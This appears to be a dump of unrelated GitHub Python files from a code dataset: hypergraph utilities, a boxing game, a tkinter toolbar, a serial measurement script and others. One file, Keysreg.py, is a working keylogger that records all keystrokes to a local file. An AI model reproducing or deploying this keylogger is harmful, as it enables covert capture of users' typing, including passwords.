\"2022-08-23T21:04:01.984063Z\"\n\n refresher = CredentialsRefresher.create_null()\n\n refreshed_creds = refresher.refresh(creds)\n\n assert not refreshed_creds.is_expired()\n\n\ndef test_testinstance_raises_error():\n creds = Credentials.get_test_instance()\n creds.expiry = \"2022-08-23T21:04:01.984063Z\"\n\n refresher = CredentialsRefresher.create_test_instance_that_errors()\n\n with pytest.raises(RefreshError):\n refreshed_creds = refresher.refresh(creds)\n","repo_name":"cadolphs/google_photo_emailer","sub_path":"tests/test_credentials_refresher.py","file_name":"test_credentials_refresher.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12126427239","text":"# This file is responsible for preparing experimental data\nfrom . import Hypergraph\nfrom .hypergraph_util import *\nfrom collections import namedtuple\nimport logging\nimport json\nimport requests\nfrom tqdm import tqdm\nfrom scipy.io import mmread\nfrom scipy.io import mmwrite\n\nlog = logging.getLogger()\n\nglobal PARSING_OPTIONS\n\n\ndef ParseRawIntoHypergraph(args, raw_data_path):\n log.info(\"Parsing %s with %s method\", raw_data_path, args.raw_data_format)\n hypergraph = PARSING_OPTIONS[args.raw_data_format](raw_data_path)\n if args.name:\n log.info(\"Setting hypergraph name to %s\", args.name)\n log.info(\"Good name!\")\n hypergraph.name = args.name\n else:\n log.info(\"Setting hypergraph name to %s\", args.hypergraph)\n log.info(\"Bad name :(\")\n hypergraph.name = args.hypergraph\n return hypergraph\n\n\n# Used to store paper data\nPaper = namedtuple(\"Paper\", ['title', 'authors'])\n\n\ndef SnapCommunityToHypergraph(path):\n with open(path, 'r') as snap_source:\n hypergraph = Hypergraph()\n for edge_idx, node_str in enumerate(snap_source):\n for node_idx in node_str.split():\n AddNodeToEdge(hypergraph, int(node_idx), edge_idx)\n return hypergraph\n\n\ndef AMinerToHypergraph(aminer_source):\n return PapersToHypergraph(ParseAMiner(aminer_source))\n\n\ndef ParseAMiner(path):\n \"\"\"\n Parses data in AMiner's format.\n Ignores all fields except title and authors\n More information on this format here: https://aminer.org/aminernetwork\n\n Input:\n - aminer_source : a file-like object\n Output: (yield)\n - a list of Papers (named tuple)\n \"\"\"\n with open(path, 'r') as aminer_source:\n log.info(\"Parsing AMiner data\")\n last_seen_title = None\n for line in aminer_source:\n if line.startswith(\"#*\"): # paper title line\n last_seen_title = line[2:].strip()\n elif line.startswith(\"#@\"): # authors line\n authors = line[2:].strip().split(';')\n yield Paper(title=last_seen_title, authors=authors)\n\n\ndef PapersToHypergraph(parser):\n \"\"\"\n Converts paper data into hypergraph.\n Input:\n - A iterable type that supplies Paper tuples\n Output:\n - A hypergraph\n \"\"\"\n log.info(\"Converting papers to hypergraph\")\n title2idx = {}\n author2idx = {}\n result = Hypergraph()\n for paper in parser:\n if paper.title not in title2idx:\n title2idx[paper.title] = len(title2idx)\n for author in paper.authors:\n if author not in author2idx:\n author2idx[author] = len(author2idx)\n AddNodeToEdge(result, author2idx[author], title2idx[paper.title], author,\n paper.title)\n return result\n\n\ndef CleanHypergraph(original_hg, min_degree=2):\n \"Iterativly removes nodes / edges with degree smaller than min_degree\"\n \"Performs operations on copy, does not change original.\"\n new_hg = Hypergraph()\n new_hg.CopyFrom(original_hg)\n log.info(\"Removing all nodes / edges with degree < %i\", min_degree)\n while len(new_hg.node) and len(new_hg.edge):\n troubled_nodes = [\n node_idx for node_idx, node in new_hg.node.items()\n if len(node.edges) < min_degree\n ]\n for node_idx in troubled_nodes:\n RemoveNode(new_hg, node_idx)\n troubled_edges = [\n edge_idx for edge_idx, edge in new_hg.edge.items()\n if len(edge.nodes) < min_degree\n ]\n for edge_idx in troubled_edges:\n RemoveEdge(new_hg, edge_idx)\n if len(troubled_nodes) == 0 and len(troubled_edges) == 0:\n break\n return new_hg\n\n\ndef DownloadMadGrades(api_token):\n instructor_url = \"https://api.madgrades.com/v1/instructors\"\n courses_url = \"https://api.madgrades.com/v1/courses\"\n\n def get_instructors_id_name(_json):\n return [(r['id'], r['name']) for r in _json['results']]\n\n def get_courses_uuid_name(_json):\n return [(r['uuid'], r['name']) for r in _json['results']]\n\n def get_instructors_on_page(page):\n response = requests.get(\n instructor_url,\n headers={\"Authorization\": \"Token token={}\".format(api_token)},\n data={'page': page})\n instructor_json = json.loads(response.text)\n total_pages = instructor_json['totalPages']\n instructors_id_name = get_instructors_id_name(instructor_json)\n return instructors_id_name, total_pages\n\n def get_courses_for_instructor(instructor_id, page):\n response = requests.get(\n courses_url,\n headers={\"Authorization\": \"Token token={}\".format(api_token)},\n data={\n 'instructor': instructor_id,\n 'page': page\n })\n course_json = json.loads(response.text)\n courses_uuid_name = get_courses_uuid_name(course_json)\n total_pages = course_json['totalPages']\n return courses_uuid_name, total_pages\n\n instructors_id_name, total_pages = get_instructors_on_page(1)\n for page in tqdm(range(2, total_pages + 1)):\n instructors_id_name.extend(get_instructors_on_page(page)[0])\n\n uuid_map = {}\n result = Hypergraph()\n for instructor_id, instructor_name in tqdm(instructors_id_name):\n result.node[instructor_id].name = instructor_name\n courses_uuid_name, total_pages = get_courses_for_instructor(\n instructor_id, 1)\n for page in range(2, total_pages + 1):\n courses_uuid_name.extend(\n get_courses_for_instructor(instructor_id, page)[0])\n for course_uuid, course_name in courses_uuid_name:\n if course_uuid not in uuid_map:\n uuid_map[course_uuid] = len(uuid_map)\n if course_name is not None:\n result.edge[uuid_map[course_uuid]].name = course_name\n AddNodeToEdge(result, instructor_id, uuid_map[course_uuid])\n return result\n\n\ndef LoadMTX(path):\n mtx = mmread(str(path))\n hypergraph = FromSparseMatrix(mtx.T)\n return hypergraph\n\ndef SaveMTX(hypergraph, path):\n mtx_mat = ToEdgeCsrMatrix(hypergraph).astype(np.int32)\n mmwrite(str(path), mtx_mat, comment=hypergraph.name)\n\ndef LoadHMetis(path):\n hypergraph = Hypergraph()\n with open(path) as hmetis_file:\n next(hmetis_file)\n for edge_idx, line in enumerate(hmetis_file):\n for node_idx in [int(t)-1 for t in line.strip().split()]:\n AddNodeToEdge(hypergraph, node_idx, edge_idx)\n return hypergraph\n\ndef SaveHMetis(hypergraph, path):\n # Read: http://glaros.dtc.umn.edu/gkhome/fetch/sw/hmetis/manual.pdf\n # hmetis requires indices in order\n with open(path, 'w') as hmetis_file:\n # 11 refers to both weighted nodes and hyperedges\n hmetis_file.write(\"{} {} 11\\n\".format(len(hypergraph.edge),\n len(hypergraph.node)))\n for edge_idx in range(len(hypergraph.edge)):\n hmetis_file.write(str(int(hypergraph.edge[edge_idx].weight)))\n for node_idx in hypergraph.edge[edge_idx].nodes:\n hmetis_file.write(\" \")\n # indices are all positive\n hmetis_file.write(str(node_idx + 1))\n hmetis_file.write(\"\\n\")\n for node_idx in range(len(hypergraph.node)):\n hmetis_file.write(str(int(hypergraph.node[node_idx].weight)))\n hmetis_file.write(\"\\n\")\n\ndef SaveEdgeList(hypergraph, data_path, metadata_path=None, is_weighted=False,\n only_one_side=False):\n hypergraph, node2original, edge2original = CompressRange(hypergraph)\n node2inc = {node_idx: node_idx+1 for node_idx in hypergraph.node}\n max_node_idx = max(hypergraph.node)+1\n edge2inc = {edge_idx: edge_idx+max_node_idx+1 for edge_idx in hypergraph.edge}\n # Now the indices range from 1-(n+m)\n hypergraph = Relabel(hypergraph, node2inc, edge2inc)\n node2original = {node2inc[curr]: original for curr, original in node2original.items()}\n edge2original = {edge2inc[curr]: original for curr, original in edge2original.items()}\n\n with open(data_path, 'w') as data_file:\n for node_idx, node in hypergraph.node.items():\n for edge_idx in node.edges:\n data_file.write(\"{} {} {}\\n\".format(\n node_idx, edge_idx, 1 if is_weighted else \"\"\n ))\n if not only_one_side:\n data_file.write(\"{} {} {}\\n\".format(\n edge_idx, node_idx, 1 if is_weighted else \"\"\n ))\n if metadata_path is not None:\n with open(metadata_path, 'w') as meta_file:\n for node, original in node2original.items():\n meta_file.write(\"Replace {} with node_idx {}\\n\".format(node, original))\n for edge, original in edge2original.items():\n meta_file.write(\"Replace {} with edge_idx {}\\n\".format(edge, original))\n\n\n\ndef LoadMetadataMaps(metadata_path):\n node_map = {}\n edge_map = {}\n with open(metadata_path) as file:\n for line in file:\n tokens = line.split()\n assert len(tokens) == 5\n written_idx = int(tokens[1])\n original_idx = int(tokens[4])\n node_edge_switch = tokens[3]\n if node_edge_switch == 'node_idx':\n node_map[written_idx] = original_idx\n elif node_edge_switch == 'edge_idx':\n edge_map[written_idx] = original_idx\n else:\n raise ValueError(\"Metadata file is invalid\")\n return node_map, edge_map\n\ndef LoadEdgeList(data_path, metadata_path=None):\n hypergraph = Hypergraph()\n\n if metadata_path is None:\n with open(data_path) as file:\n for line in file:\n tokens = line.split()\n left_idx = int(tokens[0])\n right_idx = int(tokens[1])\n AddNodeToEdge(hypergraph, left_idx, right_idx)\n\n else: # With metadata\n node_map, edge_map = LoadMetadataMaps(metadata_path)\n with open(data_path) as file:\n for line in file:\n tokens = line.split()\n assert len(tokens) == 2 or len(tokens) == 3\n left_idx = int(tokens[0])\n right_idx = int(tokens[1])\n if left_idx in node_map:\n assert right_idx in edge_map\n AddNodeToEdge(hypergraph, node_map[left_idx], edge_map[right_idx])\n elif left_idx in edge_map:\n assert right_idx in node_map\n AddNodeToEdge(hypergraph, node_map[right_idx], edge_map[left_idx])\n else:\n raise ValueError(\"Hypergraph file is invalid. Idx {} not found.\".format(left_idx))\n\n return hypergraph\n\n\nPARSING_OPTIONS = {\n \"AMINER\":\n AMinerToHypergraph,\n \"SNAP\":\n SnapCommunityToHypergraph,\n \"SNAP_CLEAN\":\n lambda source: CleanHypergraph(SnapCommunityToHypergraph(source)),\n \"DL_MAD_GRADES\":\n DownloadMadGrades,\n \"MTX\":\n LoadMTX,\n \"HMETIS\":\n LoadHMetis,\n}\n","repo_name":"JSybrandt/HypergraphEmbedding","sub_path":"hypergraph_embedding/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"41744693757","text":"from pynput import keyboard\n\n# List to store pressed keys\nkeys = []\n\n# Configurable file name\nfile_name = \"key_log.txt\"\n\ndef on_press(key):\n try:\n # Append the key to the list\n keys.append(key.char)\n except AttributeError:\n # If it's not a printable key, append its representation\n keys.append(str(key))\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n # If the 'Esc' key is pressed, stop the keylogger and save to a file\n write_to_file()\n return False\n\ndef write_to_file():\n try:\n # Convert the keys to a string\n data = \"\".join(keys)\n\n # Write the data to a file\n with open(file_name, \"w\") as f:\n f.write(data)\n except Exception as e:\n print(f\"Error writing to the file: {e}\")\n\n# Configure the listeners\nwith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n # Keep the program running\n listener.join()\n","repo_name":"Rootuser47363/Keysreg.py","sub_path":"Keysreg.py","file_name":"Keysreg.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2608375965","text":"from random import randint\nfrom colorama import Fore, Style\nclass Peoples:\n def __init__(self, name):\n self.name = name #Full name of the person\n #TODO\n # self.age = age # older boxers lost more health\n # self.weight = weight # heavy boxers cause more damage\n\n\nclass Boxers(Peoples):\n def set_health(self, health):\n #Set health of boxer\n self.health = health\n\n def get_health(self):\n #Function for health status check\n return self.health\n\n def hit_move(self, name, cur_hit):\n #Chose current attach move\n if cur_hit == 1:\n return self.jab(name)\n elif cur_hit == 2:\n return self.cross(name)\n elif cur_hit == 3:\n return self.left_hook(name)\n elif cur_hit == 4:\n return self.right_hook(name)\n\n def defense_move(self, name, dfnd):\n #Chose current defence move\n if dfnd == 1:\n self.block(name)\n elif dfnd == 2:\n self.left_dodge(name)\n elif dfnd == 3:\n self.right_dodge(name)\n elif dfnd == 4:\n self.left_dive(name)\n elif dfnd == 5:\n self.right_dive(name)\n return dfnd\n\n #Attach functions\n def jab(self, name):\n #light damage left hand front hit (defence - right_dodge)\n print(name, 'do Jab!')\n return randint(4, 8)\n def cross(self, name):\n #middle damage right hand front hit (defence - left_dodge)\n print(name, 'do Cross!')\n return randint(8, 12)\n def left_hook(self, name):\n #powerful left hand side hit (defence - right_dive)\n print(name, 'do Left hook!')\n return randint(12, 16)\n def right_hook(self, name):\n #powerful right hand side hit (defence - left_dive)\n print(name, 'do Right hook')\n return randint(14, 18)\n\n #Defend functions\n def block(self, name):\n #defence against cross and right_hit. Reduce damage from hit to 50%\n print(name, 'do Block!')\n def left_dodge(self, name):\n #defence against cross.\n #TODO In case of cross it is counterattack possible - left_hook\n print(name, 'do Left Dodge!')\n def right_dodge(self, name):\n #defence against jab.\n #TODO In case of jab it is counterattack possible - right_hook\n print(name, 'do Right Dodge!')\n def left_dive(self, name):\n #defence against right_hook.\n #TODO Counterattack possible - right_hook\n print(name, 'do Left Dive!')\n def right_dive(self, name):\n #defence against left_hook.\n #TODO Counterattack possible - left_hook\n print(name, 'do Right Dive!')\n\nclass Fight():\n def __init__(self):\n print(Fore.RED + '-= The Fight has Begun! =-' + Style.RESET_ALL)\n\n def player_move(self, boxer1, boxer2):\n #This is the function for Player move\n cur_pl_hit = int(input('%s%s%s attack move: 1. Jab, 2. Cross, 3. Left hook, 4. Right hook: ' % (Fore.GREEN, boxer1.name, Style.RESET_ALL)))\n cur_pl_dmg_whole = boxer1.hit_move(boxer1.name, cur_pl_hit)\n cur_pl_dfnc = boxer2.defense_move(boxer2.name, randint(1, 5))\n self.calculate_damage(cur_pl_hit, cur_pl_dmg_whole, cur_pl_dfnc, boxer1, boxer2)\n\n def opponent_move(self, boxer1, boxer2):\n #This is the function for computer move\n if boxer2.health <= 0:\n return 1 #opponent in knockout\n cur_op_dfnc = boxer1.defense_move(boxer1.name, int(input('%s%s%s defence move: 1. Block, 2. Left dodge, 3. Right dodge, 4. Left dive, 5. Right dive: ' % (Fore.GREEN, boxer1.name, Style.RESET_ALL))))\n cur_op_hit = (randint(1, 4))\n cur_op_dmg_whole = boxer2.hit_move(boxer2.name, cur_op_hit)\n self.calculate_damage(cur_op_hit, cur_op_dmg_whole, cur_op_dfnc, boxer2, boxer1)\n return 0 #oponent sill have health\n\n def calculate_damage(self, hit, dmg_whole, dfnc, boxer1, boxer2):\n #This function calculates damage according of defence move\n if dfnc == 1:\n dmg = round(dmg_whole * 0.5, 2)\n boxer2.set_health(round(boxer2.get_health() - dmg, 2))\n print(\"%s%s%s caused %s%s%s damage (blocked 50%s out of %s). %s health %s[%s]%s\" % (Fore.GREEN, boxer1.name, Fore.RESET, Fore.RED, dmg, Style.RESET_ALL, '%', dmg_whole, boxer2.name, Fore.BLUE, boxer2.get_health(), Style.RESET_ALL))\n elif hit == 1 and dfnc == 3:\n print(\"%s%s%s has missed! %s has dodged from jab! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n elif hit == 2 and dfnc == 2:\n print(\"%s%s%s has missed! %s has dodged from cross! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n elif hit == 3 and dfnc == 5:\n print(\"%s%s%s has missed! %s has dived from left hook! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n elif hit == 4 and dfnc == 4:\n print(\"%s%s%s has missed! %s has dived from right hook! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n else:\n boxer2.set_health(boxer2.get_health() - dmg_whole)\n print(\"%s%s%s caused %s damage! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RED, dmg_whole, boxer2.name, boxer2.get_health()))\n\n def check_results(self, boxer1, boxer2):\n if boxer1.health <= 0 and boxer2.health <= 0:\n print('What a fight! Looks like we have a draw! %s and %s knocked out! Unbelievable!' % (boxer1.name, boxer2.name))\n elif boxer1.health <= 0:\n print('Knockout! %s%s%s knocked out! 5..4..3..2..1..%s LOST! The winner is %s%s%s. Congratulations!' % (Fore.GREEN, boxer1.name, Fore.RESET, boxer1.name, Fore.GREEN, boxer2.name, Fore.RESET))\n elif boxer2.health <= 0:\n print('%s%s%s knocked out! 5..4..3..2..1..%s LOST! The winner is %s%s%s. Congratulations!' % (Fore.GREEN, boxer2.name, Fore.RESET, boxer2.name, Fore.GREEN, boxer1.name, Fore.RESET))\n\ndef main():\n try:\n boxer1 = Boxers(str(input('Enter player name: ')))\n boxer2 = Boxers(str(input('Enter computer name: ')))\n boxer1.set_health(100)\n boxer2.set_health(100)\n main_fight = Fight()\n\n while boxer1.health > 0 and boxer2.health > 0:\n main_fight.player_move(boxer1, boxer2)\n if main_fight.opponent_move(boxer1, boxer2):\n print('Knockout!!!')\n main_fight.check_results(boxer1, boxer2)\n\n except TypeError:\n print('Error: Invalid input data. Exit the program...')\n\n\nif __name__ == '__main__':\n main()","repo_name":"taemnickyy-viktor/ITEA","sub_path":"Boxers_vtaemnic.py","file_name":"Boxers_vtaemnic.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14947661513","text":"# -*- coding:utf-8 -*-\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom tkinter import Label, Frame\r\nimport datetime\r\n\r\nfrom util.importPIL import *\r\nfrom util.widgets.infobulle import *\r\n\r\nfrom .dialog.gestionHeureCalendrierDialog import *\r\n\r\nclass ToolBar(Frame):\r\n \"\"\"\r\n Classe représentant la barre d'outils, contenant juste les boutons.\r\n Cette classe possède une mise en forme automatique des boutons et des\r\n catégories. Les commandes des boutons doivent présentes dans le master.\r\n \"\"\"\r\n def __init__(self, master, **kwargs):\r\n \"\"\"\r\n Constructeur de la barre d'outil.\r\n @param master: master du tkinter.Frame() que cet objet est.\r\n @param **kwargs: Fonctionnalités d'affichage du tkinter.Frame() que cet objet est.\r\n \"\"\"\r\n super().__init__(master, **kwargs)\r\n # Note : self.master est référence vers CalendarZone.\r\n\r\n self.lesCategories = [] # liste de cadre\r\n self.lesBoutonsEnListes = [] # liste qui va contenir toutes les autres liste de bouton (pour un affichage cool) lesBoutonsEnListes[catégorie][bouton]\r\n self.lesFramesDesBoutons = [] # tout est dans le nom ... lesFramesDesBoutons[categorie][frame]\r\n self._ajouterCategoriesEtBoutons()\r\n\r\n \"\"\r\n ##############\r\n # Méthodes : #\r\n ##############\r\n \"\"\r\n def _ajouterCategoriesEtBoutons(self):\r\n \"\"\"\r\n Méthode pour ajouter tout les boutons de la barre d'outil.\r\n Bon pour une redéfinition dans des sous-classes.\r\n \"\"\"\r\n # CADRE GESTION\r\n self._creationCategorie(\"Gestion\") #cadre gestion\r\n # création des boutons\r\n self._creationBouton(\"heure\", self.master.ajouterHeure, getImage(\"Ressources/textures/par defaut/gestion.png\"), textVisible=True)\r\n self._creationBouton(\"jour\", self.master.ajouterJour, getImage(\"Ressources/textures/par defaut/gestion.png\"), textVisible=True)\r\n \r\n # CADRE VUE\r\n self._creationCategorie(\"Vue\") #cadre vue\r\n # création des boutons\r\n self._creationBouton(\"sélectionner un jour\", self.master.selectionnerJour, getImage(\"Ressources/textures/par defaut/selectionner_un_jour.png\"))\r\n self._creationBouton(\"Afficher/masquer\", self.master.afficherMasquerJour, getImage(\"Ressources/textures/par defaut/afficher masquer a.png\"))\r\n \r\n # CADRE INTERVERTIR\r\n self._creationCategorie(\"Intervertir\")\r\n # création des boutons\r\n self._creationBouton(\"Intervertir\", self.master.deplacerIntervertir, getImage(\"Ressources/textures/par defaut/intervertir.png\"))\r\n\r\n # CADRE DÉCALER\r\n self._creationCategorie(\"Décaler\") #cadre Décaler\r\n # création des boutons\r\n self._creationBouton(\"toutes les activités -> jour\", self.master.decalerJour, getImage(\"Ressources/textures/par defaut/decalage_J.png\"))\r\n self._creationBouton(\"toutes les activités -> heure\", self.master.decalerHeure, getImage(\"Ressources/textures/par defaut/decalage_H.png\"))\r\n\r\n # CADRE GROUPE\r\n self._creationCategorie(\"Groupe\") #cadre groupe\r\n # création des boutons\r\n self._creationBouton(\"grouper\", self.master.grouper, getImage(\"Ressources/textures/par defaut/grouper.png\"))\r\n self._creationBouton(\"dégrouper\", self.master.degrouper, getImage(\"Ressources/textures/par defaut/degrouper.png\"))\r\n \r\n # CADRE AVANCEMENT\r\n self._creationCategorie(\"Avancement\") #cadre Avancement\r\n # création des boutons\r\n self._creationBouton(\"Validation\", self.master.avancementMannuel, getImage(\"Ressources/textures/par defaut/case a cocher parfaite.png\"))\r\n self._creationBouton(\"Jour fini\", self.master.avancementJourFini, getImage(\"Ressources/textures/par defaut/avancement_Jour.png\"))\r\n self._creationBouton(\"Normal\", self.master.avancementNormal, getImage(\"Ressources/textures/par defaut/avancement normal.png\"))\r\n\r\n def _creationBouton(self, texte, fonction = None, img = None, textVisible = False):\r\n \"\"\"\r\n Permet de créer un bouton dans la dernière catégorie crée.\r\n L'ordre de création est important, car il est répercuté sur l'affichage.\r\n @param texte: Texte du bouton, quand textVisible = True ou que l'image manque.\r\n Ce texte sera aussi utilisé pour l'infobulle. TODO : Mettre un message d'infobulle à part, custom ?\r\n @param fonction = None: callback du bouton quand celui-ci est appuyé.\r\n @param img = None: Image à mettre sur le bouton, ou None si celui-ci n'as pas d'image.\r\n @param textVisible = False: True si on affiche toujours le texte, False sinon.\r\n \"\"\"\r\n # si il n'y a plus de place dans les frames, on en fait une autre (et ça marche aussi s'il n'y en a pas encore) :\r\n if len(self.lesFramesDesBoutons[-1]) == len(self.lesBoutonsEnListes[-1])/2:\r\n self.lesFramesDesBoutons[-1].append(Frame(self.lesCategories[-1]))\r\n self.lesFramesDesBoutons[-1][-1].pack(side=TOP, expand=YES, fill=BOTH)\r\n\r\n # Création et placement du bouton :\r\n if textVisible:\r\n b = Button(self.lesFramesDesBoutons[-1][-1], text=texte, compound=LEFT, command=fonction, image = img, width = 0)\r\n else:\r\n b = Button(self.lesFramesDesBoutons[-1][-1], compound=LEFT, command=fonction, image = img, width = 0) # text=texte,\r\n b.pack(side=LEFT, expand=YES, fill=BOTH, padx=2, pady=2)\r\n self.lesBoutonsEnListes[-1].append(b)\r\n ajouterInfoBulle(b, self.lesCategories[-1].cget(\"text\")+\" \"+texte)\r\n\r\n def _creationCategorie(self, texte):\r\n \"\"\"\r\n Permet de créer une catégorie.\r\n L'ordre de création est important, car il est répercuté sur l'affichage.\r\n @param texte : le nom de la catégorie.\r\n \"\"\"\r\n self.lesCategories.append(LabelFrame(self, text=texte))\r\n self.lesCategories[-1].pack(side=LEFT, fill=BOTH, expand=YES)\r\n\r\n # Liste vide à remplir de bouton :\r\n self.lesBoutonsEnListes.append([])\r\n \r\n # Liste qui va contenir les futurs frames\r\n self.lesFramesDesBoutons.append([]) \r\n\r\n def changeAfficherMasquerMode(self, hide):\r\n \"\"\"\r\n Méthode qui change l'image du bouton si des schedulables sont cachées\r\n @param hide : False alors il n'y a rien de masqué\r\n \"\"\"\r\n if not hide:\r\n self.lesBoutonsEnListes[1][1].config(image = getImage(\"Ressources/textures/par defaut/afficher masquer a.png\"))\r\n else:\r\n self.lesBoutonsEnListes[1][1].config(image = getImage(\"Ressources/textures/par defaut/afficher masquer b.png\"))\r\n","repo_name":"Zetrypio/TaskManager","sub_path":"TaskManager/toolbar/ToolBar.py","file_name":"ToolBar.py","file_ext":"py","file_size_in_byte":6680,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18804648137","text":"#!/usr/bin/env python\nimport struct\nimport serial\nimport time\n\nser = serial.Serial()\n# Configuration of serial port\nser.port = \"/dev/tty.usbserial\"\nser.baudrate = 9600\nser.bytesize = serial.EIGHTBITS\nser.parity = serial.PARITY_NONE\nser.stopbits = serial.STOPBITS_TWO\nser.timeout = 2\nser.xonxoff = False\nser.rtscts = False\nser.dsrdtr = True\n\ntry:\n\tser.open()\nexcept(e):\n\tprint(\"Cannot open serial port: {}\".format(str(e)))\n\texit()\nprint(ser.isOpen())\n\nprint(\"Serial start\")\n\n# command = \"*IDN?\"\n\ncommand = \":SYST:REM;\"\nser.write(command.encode(\"utf-8\"))\nser.write(\"\\n\".encode(\"utf-8\"))\n# ret = ser.read_until().decode(\"utf-8\")\n\n# command = \"MEASure:RESistance?\"\ncommand = \":MEAS:VOLT:DC?\"\n\nser.write(command.encode(\"utf-8\"))\nser.write(\"\\n\".encode(\"utf-8\"))\nret = ser.read_until().decode(\"utf-8\")\n\nprint(\"return value: \", ret)\n\nser.close()","repo_name":"breathewind/Measurement-UI","sub_path":"MeasurementUI/Scripts/Check_connection.py","file_name":"Check_connection.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31161434760","text":"import logging\nimport random\nimport re\n\nfrom chirpy.core.response_generator import Treelet\nfrom chirpy.core.response_priority import ResponsePriority\nfrom chirpy.core.response_generator_datatypes import ResponseGeneratorResult, PromptResult, PromptType\nfrom chirpy.core.entity_linker.entity_groups import ENTITY_GROUPS_FOR_EXPECTED_TYPE\nfrom chirpy.core.regex.response_lists import RESPONSE_TO_THATS, RESPONSE_TO_DIDNT_KNOW\nfrom chirpy.response_generators.music.regex_templates.name_favorite_song_template import NameFavoriteSongTemplate\nfrom chirpy.response_generators.music.utils import WikiEntityInterface\nfrom chirpy.response_generators.wiki2.wiki_utils import get_til_title\nimport chirpy.response_generators.music.response_templates.general_templates as templates\nfrom chirpy.response_generators.music.state import ConditionalState\nfrom chirpy.response_generators.music.music_helpers import ResponseType\n\ndef nlu_processing(rg, state, utterance, response_types):\n flags = {\n 'song_ent_exists': False,\n 'dont_know': False,\n 'no_fav_song': False,\n 'tils_exist': False,\n 'metadata_exists': False\n }\n\n cur_singer_str = None\n cur_song_str = None\n cur_song_ent = None\n # if cur_song_str is not None:\n # conditional_state.cur_song_str = cur_song_str\n # if cur_song_ent is not None:\n # conditional_state.cur_song_ent = cur_song_ent\n # if cur_singer_str is not None:\n\n cur_song_ent, cur_singer_ent = rg.get_song_and_singer_entity()\n if cur_song_ent:\n flags['song_ent_exists'] = True\n cur_song_str = cur_song_ent.talkable_name\n cur_song_str = re.sub(r'\\(.*?\\)', '', cur_song_str)\n tils = get_til_title(cur_song_ent.name)\n if len(tils):\n flags['tils_exist'] = True\n else:\n metadata = rg.get_song_meta(cur_song_str, cur_singer_ent.talkable_name if cur_singer_ent else None)\n if metadata:\n flags['metadata_exists'] = True\n cur_singer_str = metadata['artist']\n elif ResponseType.DONT_KNOW in response_types:\n flags['dont_know'] = True\n elif ResponseType.NO in response_types or ResponseType.NOTHING in response_types:\n flags['no_fav_song'] = True\n elif cur_singer_ent is None:\n song_slots = NameFavoriteSongTemplate().execute(utterance)\n if song_slots is not None and 'favorite' in song_slots:\n cur_song_str = song_slots['favorite']\n cur_song_ent = rg.get_song_entity(cur_song_str)\n\n if cur_song_ent:\n tils = get_til_title(cur_song_ent.name)\n if len(tils):\n flags['tils_exist'] = True\n\n metadata = rg.get_song_meta(cur_song_str, None)\n if metadata:\n flags['metadata_exists'] = True\n cur_singer_str = metadata['artist']\n\n if cur_song_str is not None:\n state.cur_song_str = cur_song_str\n if cur_song_ent is not None:\n state.cur_song_ent = cur_song_ent\n if cur_singer_str is not None:\n state.cur_singer_str = cur_singer_str\n\n return flags\n\ndef prompt_nlu_processing(rg, state, utterance, response_types):\n flags = {\n 'tils_exist': False,\n 'cur_song_ent_exists': False,\n 'metadata_exists': False\n }\n\n cur_song_ent, cur_singer_ent = rg.get_song_and_singer_entity()\n if cur_song_ent:\n cur_song_str = cur_song_ent.talkable_name\n cur_song_str = re.sub(r'\\(.*?\\)', '', cur_song_str)\n flags['cur_song_ent_exists'] = True\n cur_singer_str = None\n if cur_singer_ent:\n cur_singer_str = cur_singer_ent.talkable_name\n cur_singer_str = re.sub(r'\\(.*?\\)', '', cur_singer_str)\n\n tils = get_til_title(cur_song_ent.name)\n if len(tils):\n flags['tils_exist'] = True\n else:\n metadata = rg.get_song_meta(cur_song_str, cur_singer_str)\n if metadata:\n flags['metadata_exists'] = True\n cur_singer_str = metadata['artist'] \n\n if cur_song_str is not None:\n state.cur_song_str = cur_song_str\n if cur_song_ent is not None:\n state.cur_song_ent = cur_song_ent\n if cur_singer_str is not None:\n state.cur_singer_str = cur_singer_str\n\n return flags\n\n\n\n\n\n\n\n\n\n","repo_name":"shashank2000/chirpy_lambda","sub_path":"package/chirpy/response_generators/music/yaml_files/supernodes/music_get_song/nlu.py","file_name":"nlu.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13265943514","text":"import torch\nimport models.cifar as models\nimport torch.optim as optim\nfrom ms_net_utils import *\nfrom data_utils import *\n\n\ndef load_teacher_network():\n \"\"\" return the best teacher network with state_dict. \"\"\"\n\n teacher = models.__dict__['resnext'](\n cardinality=8,\n num_classes=10,\n depth=29,\n widen_factor=4,\n dropRate=0,\n )\n teacher = torch.nn.DataParallel(teacher).cuda()\n checkpoint = torch.load(\"./ck_backup/teachers/resnext_best.pth.tar\")\n teacher.load_state_dict(checkpoint['state_dict'])\n return teacher\n\n\ndef load_expert_networks_and_optimizers(lois, \n num_classes, \n dataset, \n arch, \n depth, \n block_name,\n initialize_with_router=True,\n finetune_experts=True\n ):\n experts = {}\n eoptimizers = {}\n chk = torch.load('./ck_backup/%s/%s-depth-%s/checkpoint/model_best.pth.tar'%(dataset, arch, depth))\n for loi in lois:\n experts[loi] = 